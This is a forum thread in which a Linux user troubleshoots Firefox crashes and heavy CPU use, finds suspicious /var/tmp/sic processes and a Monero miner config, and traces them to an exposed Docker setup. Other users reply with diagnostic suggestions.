After repeated firefox crashes I suspect a malware infection

Firefox randomly shuts down and at the same time the cpu usage increments heavily.

I noticed that when I check what is happening with htop, there appear four new processes each of them named /var/tmp/sic/sic that take away all the cpu usage.

I checked in my /var/tmp/sic folder and discovered a package.json file that looks very suspicious to me, as it has attributes named "donate-level" and "donate-over-proxy" as well as a part '"coin":"monero"'.

I am not very experienced with linux yet and would be very thankful on any suggestions on how to further investigate this matter. I am also happy to provide any kind of logs if needed.

start firefox in safe mode

What about extensions installed ?

5 Likes

From reading this, it would come from a Firefox add-on that include a cryptominer. So checking your add-ons would be indeed a good first step.

Also, the use of package.json notes a pre-WebExtension add-on, which are not supported since Firefox 57. If you are still holding on an old Firefox (like firefox-esr52 i spot in AUR), i think it's time you switch to the latest version.

4 Likes

Can you start firefox from console?
And post the output here.

1 Like

Additionally to the posts above: some sites use cryptomining via JavaScript. A mere visit with enabled JavaScript has your machine mining for them.
This will only use cpu ressources if the site is open in your browser.

2 Likes

Thank you very much for all your comments!

I did some more research by googling parts of that package.json file,
especially one long hash, and now I am pretty sure I got hijacked
because I misconfigured docker and afterwards stupidly exposed some
ports in a public network. Everything is very well explained in this
article, that even names the specific hash I found in my
package.json. It points to a crypto currency wallet:

I think Firefox "noticed" this in some way and therefore shut down?